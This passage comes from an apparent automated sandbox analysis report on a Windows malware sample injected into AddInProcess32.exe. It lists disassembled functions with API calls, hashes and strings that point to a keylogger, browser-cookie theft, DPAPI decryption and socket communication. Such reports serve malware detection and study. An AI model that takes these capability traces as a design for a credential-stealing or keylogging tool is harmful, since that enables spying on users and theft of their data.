                  • Opcode ID: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
                  • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                  • Opcode Fuzzy Hash: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
                  • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                  Function 0041C3F1 Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C44D
                  • CloseHandle.KERNEL32(00000000), ref: 0041C459
                  • WriteFile.KERNEL32(00000000,00000000,00000000,00406F85,00000000), ref: 0041C46A
                  • CloseHandle.KERNEL32(00000000), ref: 0041C477
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseHandle$CreatePointerWrite
                  • String ID:
                  • API String ID: 1852769593-0
                  • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                  • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                  • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                  • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                  Function 00448299 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetLastError.KERNEL32(?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044829E
                  • _free.LIBCMT ref: 004482D3
                  • _free.LIBCMT ref: 004482FA
                  • SetLastError.KERNEL32(00000000), ref: 00448307
                  • SetLastError.KERNEL32(00000000), ref: 00448310
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorLast$_free
                  • String ID:
                  • API String ID: 3170660625-0
                  • Opcode ID: ce9cc6301b23d983ade5427f2db299c0b586cbcb428296df669d0de5b5bf801f
                  • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                  • Opcode Fuzzy Hash: ce9cc6301b23d983ade5427f2db299c0b586cbcb428296df669d0de5b5bf801f
                  • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                  Function 004509BC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • _free.LIBCMT ref: 004509D4
                    • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                    • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                  • _free.LIBCMT ref: 004509E6
                  • _free.LIBCMT ref: 004509F8
                  • _free.LIBCMT ref: 00450A0A
                  • _free.LIBCMT ref: 00450A1C
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                  • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                  • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                  • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                  Function 00444048 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                  Download Yara Rule
                  APIs
                  • _free.LIBCMT ref: 00444066
                    • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                    • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                  • _free.LIBCMT ref: 00444078
                  • _free.LIBCMT ref: 0044408B
                  • _free.LIBCMT ref: 0044409C
                  • _free.LIBCMT ref: 004440AD
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                  • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                  • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                  • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                  Function 0044BA37 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: PkGNG
                  • API String ID: 0-263838557
                  • Opcode ID: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
                  • Instruction ID: 56b21f6c39f874414c878b072b89285690216c2d241c0ad811085e1835033e53
                  • Opcode Fuzzy Hash: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
                  • Instruction Fuzzy Hash: 1B51B271D00249AAEF14DFA9C885FAFBBB8EF45314F14015FE400A7291DB78D901CBA9
                  Function 0044E6E9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                  Download Yara Rule
                  APIs
                  • _strpbrk.LIBCMT ref: 0044E738
                  • _free.LIBCMT ref: 0044E855
                    • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD1B
                    • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417), ref: 0043BD3D
                    • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000), ref: 0043BD44
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                  • String ID: *?$.
                  • API String ID: 2812119850-3972193922
                  • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                  • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                  • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                  • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                  Function 00415AEA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CountEventTick
                  • String ID: !D@$NG
                  • API String ID: 180926312-2721294649
                  • Opcode ID: 3d261558ad018fccd4b1db3b2adf3e9912d7a273ea376c309d6eaae2c8c0653a
                  • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                  • Opcode Fuzzy Hash: 3d261558ad018fccd4b1db3b2adf3e9912d7a273ea376c309d6eaae2c8c0653a
                  • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                  Function 00409EA3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                  Download Yara Rule
                  APIs
                  • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                    • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                    • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C52A
                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateFileKeyboardLayoutNameconnectsend
                  • String ID: XQG$NG$PG
                  • API String ID: 1634807452-3565412412
                  • Opcode ID: 54480eb0bc649cc79f0ae2d6016b7d596c1c2f6fed1d275c9adea3c12e8bc9d3
                  • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
                  • Opcode Fuzzy Hash: 54480eb0bc649cc79f0ae2d6016b7d596c1c2f6fed1d275c9adea3c12e8bc9d3
                  • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
                  Function 00442385 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                  Download Yara Rule
                  APIs
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                  • String ID: `#D$`#D
                  • API String ID: 885266447-2450397995
                  • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                  • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                  • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                  • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                  Function 00443435 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000104), ref: 00443475
                  • _free.LIBCMT ref: 00443540
                  • _free.LIBCMT ref: 0044354A
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: _free$FileModuleName
                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  • API String ID: 2506810119-760905667
                  • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                  • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                  • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                  • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                  Function 0044B81F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0044BB7E,?,00000000,FF8BC35D), ref: 0044B8D2
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B900
                  • GetLastError.KERNEL32 ref: 0044B931
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharErrorFileLastMultiWideWrite
                  • String ID: PkGNG
                  • API String ID: 2456169464-263838557
                  • Opcode ID: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
                  • Instruction ID: a4f89274a665815b2d7bd0a52cbb4c71b9b2878c435ac706d73e761117ab6cd9
                  • Opcode Fuzzy Hash: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
                  • Instruction Fuzzy Hash: 18317271A002199FDB14DF59DC809EAB7B8EB48305F0444BEE90AD7260DB34ED80CBA4
                  Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                  Download Yara Rule
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                    • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                    • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
                    • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587
                    • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                  • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                  • String ID: /sort "Visit Time" /stext "$0NG
                  • API String ID: 368326130-3219657780
                  • Opcode ID: 074ad0252c5f85a0395eaa63b88ebd601cb6552471d06d252c91316da9998368
                  • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                  • Opcode Fuzzy Hash: 074ad0252c5f85a0395eaa63b88ebd601cb6552471d06d252c91316da9998368
                  • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                  Function 0041C9E2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                  Download Yara Rule
                  APIs
                  • SystemParametersInfoW.USER32 ref: 0041CAD7
                    • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                    • Part of subcall function 0041376F: RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000), ref: 004137A6
                    • Part of subcall function 0041376F: RegCloseKey.ADVAPI32(0046611C), ref: 004137B1
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseCreateInfoParametersSystemValue
                  • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                  • API String ID: 4127273184-3576401099
                  • Opcode ID: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
                  • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                  • Opcode Fuzzy Hash: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
                  • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                  Function 004162E4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                  Download Yara Rule
                  APIs
                  • _wcslen.LIBCMT ref: 004162F5
                    • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                    • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                    • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4), ref: 004138AB
                    • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: _wcslen$CloseCreateValue
                  • String ID: !D@$okmode$PG
                  • API String ID: 3411444782-3370592832
                  • Opcode ID: 3229767f42b224c22e38ab05f87ced9dbd25ea478007aec8b0515c8cef1bdfe3
                  • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                  • Opcode Fuzzy Hash: 3229767f42b224c22e38ab05f87ced9dbd25ea478007aec8b0515c8cef1bdfe3
                  • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                  Function 0040C5EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6
                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C688
                  Strings
                  • User Data\Default\Network\Cookies, xrefs: 0040C603
                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExistsFilePath
                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                  • API String ID: 1174141254-1980882731
                  • Opcode ID: ec0199523fc237e56364718817167f2e0688e89b82cc13cff5a9b1f21d5ed8d2
                  • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                  • Opcode Fuzzy Hash: ec0199523fc237e56364718817167f2e0688e89b82cc13cff5a9b1f21d5ed8d2
                  • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                  Function 0040C6BB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000), ref: 0040C559
                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C757
                  Strings
                  • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExistsFilePath
                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                  • API String ID: 1174141254-1980882731
                  • Opcode ID: 830e565da1f4430f56a3fad2b3585c60fae3d202001501423d8e3de01861922a
                  • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                  • Opcode Fuzzy Hash: 830e565da1f4430f56a3fad2b3585c60fae3d202001501423d8e3de01861922a
                  • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                  Function 0040A179 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                  Download Yara Rule
                  APIs
                  • CreateThread.KERNEL32(00000000,00000000,0040A27D,004750F0,00000000,00000000), ref: 0040A1FE
                  • CreateThread.KERNEL32(00000000,00000000,0040A267,004750F0,00000000,00000000), ref: 0040A20E
                  • CreateThread.KERNEL32(00000000,00000000,0040A289,004750F0,00000000,00000000), ref: 0040A21A
                    • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                    • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateThread$LocalTimewsprintf
                  • String ID: Offline Keylogger Started
                  • API String ID: 465354869-4114347211
                  • Opcode ID: 739852a997fc0ae6182b294a28b4bb93c4a2cbea1e12e060c92b97aef043fd25
                  • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                  • Opcode Fuzzy Hash: 739852a997fc0ae6182b294a28b4bb93c4a2cbea1e12e060c92b97aef043fd25
                  • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                  Function 0040AEEE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                    • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                  • CreateThread.KERNEL32(00000000,00000000,0040A267,?,00000000,00000000), ref: 0040AF6E
                  • CreateThread.KERNEL32(00000000,00000000,0040A289,?,00000000,00000000), ref: 0040AF7A
                  • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateThread$LocalTime$wsprintf
                  • String ID: Online Keylogger Started
                  • API String ID: 112202259-1258561607
                  • Opcode ID: be6d66d5fa79c5f31e74c778d4d5e15bc8bc5d5b3a82591b70bbeab99a5f0c5b
                  • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
                  • Opcode Fuzzy Hash: be6d66d5fa79c5f31e74c778d4d5e15bc8bc5d5b3a82591b70bbeab99a5f0c5b
                  • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
                  Function 0041B4EF Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59timeCOMMON
                  Download Yara Rule
                  APIs
                  • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: LocalTime
                  • String ID: | $%02i:%02i:%02i:%03i $PkGNG
                  • API String ID: 481472006-3277280411
                  • Opcode ID: cd8841d7ce7b31923eb0730a989a812e14017909399abac035ca2ef2887a575a
                  • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                  • Opcode Fuzzy Hash: cd8841d7ce7b31923eb0730a989a812e14017909399abac035ca2ef2887a575a
                  • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                  Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                  Download Yara Rule
                  APIs
                  • GetLocalTime.KERNEL32(?), ref: 00404F81
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                  • CreateThread.KERNEL32(00000000,00000000,00405150,?,00000000,00000000), ref: 00404FE0
                  Strings
                  • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Create$EventLocalThreadTime
                  • String ID: KeepAlive | Enabled | Timeout:
                  • API String ID: 2532271599-1507639952
                  • Opcode ID: 7c8a9ce4b383af45d5410d66a549d3ab3812e2de270479e75a3fa2d1d41e82a0
                  • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                  • Opcode Fuzzy Hash: 7c8a9ce4b383af45d5410d66a549d3ab3812e2de270479e75a3fa2d1d41e82a0
                  • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                  Function 00406A63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryA.KERNEL32(crypt32), ref: 00406A82
                  • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID: CryptUnprotectData$crypt32
                  • API String ID: 2574300362-2380590389
                  • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                  • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                  • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                  • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                  Function 0044C253 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000), ref: 0044C28C
                  • GetLastError.KERNEL32 ref: 0044C296
                  • __dosmaperr.LIBCMT ref: 0044C29D
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorFileLastPointer__dosmaperr
                  • String ID: PkGNG
                  • API String ID: 2336955059-263838557
                  • Opcode ID: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
                  • Instruction ID: 03228b3a5a263cac3d3762c0c6cb9bea0ee6cefe7ee70a3785aa569069518732
                  • Opcode Fuzzy Hash: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
